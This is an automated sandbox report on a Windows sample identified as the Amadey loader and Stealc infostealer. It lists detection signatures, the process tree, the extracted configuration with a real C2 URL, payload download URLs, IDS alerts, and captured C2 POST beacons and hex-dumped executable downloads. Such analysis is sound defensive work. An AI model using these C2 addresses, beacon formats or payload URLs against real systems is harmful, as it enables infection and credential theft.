Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yjzllYsjlU.exe

Overview

General Information

Sample name:yjzllYsjlU.exe
renamed because original name is a hash value
Original sample name:05b4b94fe502b06454e6fe20b6965c76.exe
Analysis ID:1518031
MD5:05b4b94fe502b06454e6fe20b6965c76
SHA1:bfa65de4bbea7bf16322882eb0cbb0909efcf0db
SHA256:4a5c55ccde112d37cacac44e44b9dea894299902f10a9c6ca4505b145019fdd1
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Amadey, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • yjzllYsjlU.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\yjzllYsjlU.exe" MD5: 05B4B94FE502B06454E6FE20B6965C76)
    • WerFault.exe (PID: 2548 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 720 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6240 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 788 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 852 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1908 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 896 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 920 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 852 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5980 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1120 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1176 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • skotes.exe (PID: 6008 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 05B4B94FE502B06454E6FE20B6965C76)
      • WerFault.exe (PID: 3064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 468 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1400 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • skotes.exe (PID: 1488 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 05B4B94FE502B06454E6FE20B6965C76)
    • WerFault.exe (PID: 6784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 536 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5980 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4900 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    0000001C.00000002.4668968733.00000000006D0000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0xec8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2353337149.000000000052C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1328:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000015.00000002.2334468394.00000000006ED000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1170:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000015.00000002.2334219685.0000000000400000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        Click to see the 10 entries
        SourceRuleDescriptionAuthorStrings
        28.2.skotes.exe.400000.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          21.2.skotes.exe.400000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            0.2.yjzllYsjlU.exe.400000.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              21.2.skotes.exe.400000.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                21.3.skotes.exe.21e0000.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  Click to see the 13 entries

                  System Summary

                  barindex
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\1000026002\0f2a0c16ee.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0f2a0c16ee.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:30.308410+020020446961A Network Trojan was detected192.168.2.664686185.215.113.4380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:26.271870+020020442451Malware Command and Control Activity Detected185.215.113.3780192.168.2.664682TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:26.265770+020020442441Malware Command and Control Activity Detected192.168.2.664682185.215.113.3780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:26.486604+020020442461Malware Command and Control Activity Detected192.168.2.664682185.215.113.3780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:27.642684+020020442481Malware Command and Control Activity Detected192.168.2.664682185.215.113.3780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:26.493256+020020442471Malware Command and Control Activity Detected185.215.113.3780192.168.2.664682TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:26.046162+020020442431Malware Command and Control Activity Detected192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:53.000344+020020442431Malware Command and Control Activity Detected192.168.2.664700185.215.113.3780TCP
                  2024-09-25T10:33:56.102303+020020442431Malware Command and Control Activity Detected192.168.2.664705185.215.113.3780TCP
                  2024-09-25T10:34:00.223240+020020442431Malware Command and Control Activity Detected192.168.2.664708185.215.113.3780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:26.537731+020028561211A Network Trojan was detected192.168.2.664683185.215.113.4380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:11.607701+020028561471A Network Trojan was detected192.168.2.649750185.215.113.4380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:25.592506+020028561221A Network Trojan was detected185.215.113.4380192.168.2.664680TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:21.971959+020028033053Unknown Traffic192.168.2.664681185.215.113.10380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T10:33:28.070732+020028033043Unknown Traffic192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:32.850576+020028033043Unknown Traffic192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:34.611706+020028033043Unknown Traffic192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:35.954713+020028033043Unknown Traffic192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:37.425841+020028033043Unknown Traffic192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:45.085160+020028033043Unknown Traffic192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:46.175156+020028033043Unknown Traffic192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:48.531183+020028033043Unknown Traffic192.168.2.664695185.215.113.10380TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: yjzllYsjlU.exeAvira: detected
                  Source: http://185.215.113.43/Zu7JuNko/index.phpAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.103/steam/random.exe;Avira URL Cloud: Label: malware
                  Source: http://185.215.113.103/mine/random.exeAvira URL Cloud: Label: malware
                  Source: http://185.215.113.43/Zu7JuNko/index.phpy1mb3JtLXVybGVuY29kZWQ=Avira URL Cloud: Label: phishing
                  Source: http://185.215.113.103/steam/random.exeAvira URL Cloud: Label: malware
                  Source: 00000000.00000003.2213576704.00000000021F0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                  Source: C:\Users\user\1000026002\0f2a0c16ee.exeReversingLabs: Detection: 36%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeReversingLabs: Detection: 36%
                  Source: C:\Users\user\AppData\Local\Temp\1000023001\532d9160c6.exeReversingLabs: Detection: 36%
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 39%
                  Source: yjzllYsjlU.exeReversingLabs: Detection: 39%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: yjzllYsjlU.exeJoe Sandbox ML: detected

                  Compliance

                  barindex
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeUnpacked PE file: 0.2.yjzllYsjlU.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 21.2.skotes.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 28.2.skotes.exe.400000.0.unpack
                  Source: yjzllYsjlU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0043DC0D FindFirstFileExW,0_2_0043DC0D
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021BDE74 FindFirstFileExW,0_2_021BDE74
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021ADE74 FindFirstFileExW,21_2_021ADE74
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0043DC0D FindFirstFileExW,28_2_0043DC0D
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0065DE74 FindFirstFileExW,28_2_0065DE74
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_b230dc6fc163fdde8365dc55937a5169439a2_360c380b_6dcdc8c6-df7e-46a7-9ca7-325d7431e179\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yjzllYsjlU.exe_4363f676aae74bac2ea5a449ac7ab892edc3967c_8cd1c366_09477d72-c3db-4fb9-94d5-24870ab915c0\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49750 -> 185.215.113.43:80
                  Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:64680
                  Source: Network trafficSuricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.6:64683 -> 185.215.113.43:80
                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:64682 -> 185.215.113.37:80
                  Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:64682 -> 185.215.113.37:80
                  Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.6:64682
                  Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:64682 -> 185.215.113.37:80
                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.6:64682
                  Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:64682 -> 185.215.113.37:80
                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:64686 -> 185.215.113.43:80
                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:64700 -> 185.215.113.37:80
                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:64705 -> 185.215.113.37:80
                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:64708 -> 185.215.113.37:80
                  Source: Malware configuration extractorIPs: 185.215.113.43
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 25 Sep 2024 08:33:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Sep 2024 08:32:53 GMTETag: "66000-622ed77d44b57"Accept-Ranges: bytesContent-Length: 417792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b b7 d9 41 0f d6 b7 12 0f d6 b7 12 0f d6 b7 12 60 a0 1c 12 17 d6 b7 12 60 a0 29 12 2f d6 b7 12 60 a0 1d 12 73 d6 b7 12 06 ae 24 12 06 d6 b7 12 0f d6 b6 12 9c d6 b7 12 60 a0 18 12 0e d6 b7 12 60 a0 2d 12 0e d6 b7 12 60 a0 2a 12 0e d6 b7 12 52 69 63 68 0f d6 b7 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 23 49 a2 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 fa 00 00 00 1a 07 02 00 00 00 00 53 38 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 07 02 00 04 00 00 2a 84 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 00 04 00 64 00 00 00 00 d0 05 02 50 05 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 fb 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 22 f9 00 00 00 10 00 00 00 fa 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 fc 02 00 00 10 01 00 00 fe 02 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 b2 01 02 00 10 04 00 00 5e 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 05 02 00 00 d0 05 02 00 06 02 00 00 5a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 25 Sep 2024 08:33:48 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 25 Sep 2024 08:32:47 GMTETag: "68e00-622ed777f557e"Accept-Ranges: bytesContent-Length: 429568Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1f d2 8a d1 5b b3 e4 82 5b b3 e4 82 5b b3 e4 82 34 c5 4f 82 4d b3 e4 82 34 c5 7a 82 7b b3 e4 82 34 c5 4e 82 28 b3 e4 82 52 cb 77 82 52 b3 e4 82 5b b3 e5 82 d4 b3 e4 82 34 c5 4b 82 5a b3 e4 82 34 c5 7e 82 5a b3 e4 82 34 c5 79 82 5a b3 e4 82 52 69 63 68 5b b3 e4 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e4 7f de 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 ae 04 00 00 06 05 00 00 00 00 00 33 f9 03 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 09 00 00 04 00 00 0b 31 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 b1 04 00 64 00 00 00 00 40 08 00 d0 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b1 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 d1 03 00 18 00 00 00 20 d1 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 ad 04 00 00 10 00 00 00 ae 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 70 03 00 00 c0 04 00 00 5e 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 7c 01 00 00 40 08 00 00 7e 01 00 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
